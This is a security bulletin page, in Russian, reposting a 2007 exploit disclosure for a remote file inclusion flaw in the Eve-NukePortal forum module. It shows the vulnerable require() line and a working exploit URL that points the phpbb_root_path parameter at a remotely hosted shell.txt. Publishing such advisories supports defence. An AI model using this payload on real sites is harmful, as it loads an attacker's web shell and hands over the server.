Уведомление о безопасности: Eve-NukePortal file include (phpbb_root_path)

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability
  codebb 1.1b3 (phpbb_root_path
)Remote File Include Vulnerability
  Kaqoo Auction (install_root)
Multiple Remote File Include Vulnerabilities
  JC URLshrink 1.3.1 Remote Code Execution Vulnerability

From: ThE TiGeR <miro_tiger100_(at)_hotmail.com>
Date: 2 апреля 2007 г.
Subject: Eve-NukePortal file include (phpbb_root_path)

#================================================================================
===========
#Eve-NukePortal file include (phpbb_root_path)
#================================================================================
===========
#
#Script name :Eve-Nuke Portal
#
#Download script : http://puzzle.dl.sourceforge.net/sourceforge/eve-nuke/en-forums-beta.zip
#
#================================================================================
===========
#Vulnerable Code :
#
#require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);
#
#================================================================================
===========
#Exploit :
#
#http://www.site.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.
site.com/shell.txt?
#
#================================================================================
===========
#
#Discoverd By : ThE TiGeR
#
#Contact : miro_tiger100[at]hotmail[dot]com
#
#================================================================================
===========

# milw0rm.com [2007-03-27]

test server